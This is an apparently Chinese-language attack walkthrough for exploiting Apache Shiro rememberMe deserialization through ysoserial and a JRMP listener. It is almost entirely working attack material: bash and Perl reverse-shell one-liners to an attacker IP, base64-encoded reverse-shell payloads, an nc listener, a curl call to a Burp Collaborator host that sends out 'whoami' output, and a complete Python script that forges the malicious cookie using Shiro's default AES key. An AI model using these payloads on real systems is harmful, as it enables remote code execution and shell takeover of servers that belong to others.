利用JRMPClient
反弹shell方式
Bash:
bash -i >& /dev/tcp/attackIP/7777 0>&1
/bin/bash -i > /dev/tcp/attackIP/7777 0<&1 2>&1
0<&196;exec 196<>/dev/tcp/attackIP/7777; sh <&196 >&196 2>&196
Perl:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackIP:7777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
另外还需要通过http://www.jackson-t.ca/runtime-exec-payloads.html进行编码
1、vps执行
java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "bash -c {echo,YmFzaCAgLWkgPiAvZGV2RjcC8xNTAuMTA5LjIxLjg5Lzc3NzcgMDmMSAyPiYx}|{base64,-d}|{bash,-i}"
2、vps开启监听
nc -lvvp 7777
3、脚本生成payload
python shiro_exp.py attackIP:1099
4、发送payload
最后将payload放到http请求的cookie中,提交到服务端
5、执行成功后vps就会反弹一个shell
1、Burp开启Collaborator client
复制地址,如
uxvlrccmyjkksr7ys3cckj3o9ff53u.burpcollaborator.net
2、攻击者服务器VPS开启监听
java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "curl http://uxvlrccmyjkksr7ys3cckj3o9ff53u.burpcollaborator.net/`whoami`"
3、使用POC生成指向VPS JRMP Listener 服务1099端口的payload
python shiro_exp.py "attackIP:1099"
4、查看Collaborator client结果
利用CommonsBeanutils1、CommonsCollection1或者Jdk7u21
Python shiro_exp.py "bash -c {echo,YmFzaCAgLWkgPiAvZGV2L3RjcC8xNTAuMTA5LjIxLjg5Lzc3NzcgMDwmMSAyPiYx}|{base64,-d}|{bash,-i}"
vps监听nc -lvvp 7777
附shiro_exp.py
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'CommonsBeanutils1', command], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
iv = uuid.uuid4().bytes
encryptor = AES.new(key, AES.MODE_CBC, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name__ == '__main__':
payload = encode_rememberme(sys.argv[1])
print "rememberMe={0}".format(payload.decode())
注:需要下载ysoserial-0.0.6-SNAPSHOT-all.jar,github上搜一下。